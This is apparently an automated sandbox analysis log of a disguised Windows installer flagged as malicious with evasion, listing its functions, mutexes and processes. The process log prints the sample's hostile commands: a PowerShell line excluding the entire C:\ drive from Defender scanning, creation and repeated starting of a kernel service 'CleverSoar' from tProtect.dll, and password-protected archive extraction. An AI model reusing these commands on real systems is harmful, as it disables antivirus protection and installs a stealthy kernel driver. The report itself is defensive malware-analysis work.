Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3AA930
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C396900
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C318972
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3A8950
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3B6999
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C370A52
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3A4AA0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C330B66
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C38AB90
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C320BCA
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3AEBC0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3784AC
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3A4489
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C39E4D0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C382521
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3A8520
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C39C580
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C392580
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3945D0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3AE600
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3B46C0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3A67A0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C37C7F3
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3B67C0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C31C7CF
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C390020
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C39E0E0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3A8200
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3AC2A0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C393D50
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C367D43
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3B5D90
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C399E80
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C371F11
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C38589F
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3A78C8
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3999F0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C38FA50
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C391AA0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C38DAD0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C33540A
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C35F5EC
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C39F5C0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C38B650
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3AF640
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3996E0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3B9700
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3B37C0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C39F050
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C333092
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3971F0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C39D280
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C39D380
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3A6AF0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C3A3750
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009B81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009F81C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009E4250
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A08240
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A0C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A004C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009E8650
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009EC950
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009C0943
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009E8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A04EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A00E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009FD089
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009D10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009F5180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009ED1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A091C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A01120
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A0D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009753CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009D53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009BD496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A054D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A0D470
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00971572
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A01550
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009FD6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009C9652
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009797CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00989766
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A0D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00971AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009F5E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009F5F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0098E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009F22E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A12300
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009DE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009F25F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009EA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009E66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A0E990
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009F2A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009CAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009F6CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009F70D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009EB180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009DB121
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A07200
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009FF3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A0F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0099B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009E7410
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009FF420
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A0F599
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A03530
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009EF500
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A1351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A13601
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009E3790
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00A077C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0099F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009EF910
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0098BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009F7AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009C3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_0098BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009F7C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_009EFDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: String function: 6C319240 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: String function: 6C3B6F10 appears 727 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00971E40 appears 153 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 009728E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00A0FB10 appears 723 times
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.7.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124372052.000000000357E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameJvZmpUrwOHxhtD.exe vs #U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000003.2124811659.000000007F14A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameJvZmpUrwOHxhtD.exe vs #U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe, 00000000.00000000.2122778970.00000000009B9000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameJvZmpUrwOHxhtD.exe vs #U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Binary or memory string: OriginalFileNameJvZmpUrwOHxhtD.exe vs #U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.14.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.14.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal88.evad.winEXE@116/33@0/0
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C2E5D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00979313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00983D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 11_2_00979252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Code function: 8_2_6C2E5240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Program Files (x86)\Windows NT\is-QNQCH.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2224:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6208:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2672:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2360:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4388:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2224:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:432:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3840:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5512:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6116:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4512:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3908:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1172:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6636:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7136:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6860:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5608:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1340:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5256:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:4544:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6872:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5340:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6244:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1808:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2820:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6112:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6848:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5712:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | File created: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | Virustotal: Detection: 6%
Source: #U5b89#U88c5#U52a9#U624b1.0.3.exe | String found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | File read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe
Source: unknown | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Process created: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$10438,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe"
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Process created: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp "C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp" /SL5="$30450,6541320,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
